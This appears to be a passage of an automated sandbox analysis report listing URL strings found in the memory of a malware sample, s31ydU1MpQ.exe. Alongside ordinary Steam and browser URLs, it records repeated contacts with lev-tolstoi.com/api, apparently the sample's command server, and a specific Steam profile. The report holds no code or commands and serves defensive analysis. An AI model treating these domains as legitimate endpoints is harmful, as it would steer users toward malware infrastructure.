Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=e
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: s31ydU1MpQ.exe, 00000000.00000003.1342694795.000000000597C000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.stRG
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: s31ydU1MpQ.exe, 00000000.00000003.1436249870.000000000595B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1389314349.000000000595B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/4
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/=
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1318672251.0000000001297000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480098661.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415661013.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.0000000005937000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341740721.0000000001297000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1391239937.0000000005930000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005940000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1415818290.00000000012B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: s31ydU1MpQ.exe, 00000000.00000003.1436434228.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apia
Source: s31ydU1MpQ.exe, 00000000.00000003.1341921354.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apim
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apin
Source: s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apis
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.0000000001282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi0Q
Source: s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/sw
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apiglbfimdfabpdfjaoolaf
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apiocal
Source: s31ydU1MpQ.exe, 00000000.00000003.1480772440.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apissio
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296626489.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queni
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaizedrG/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/p
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001282000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001297000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.0000000001282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/xPD
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
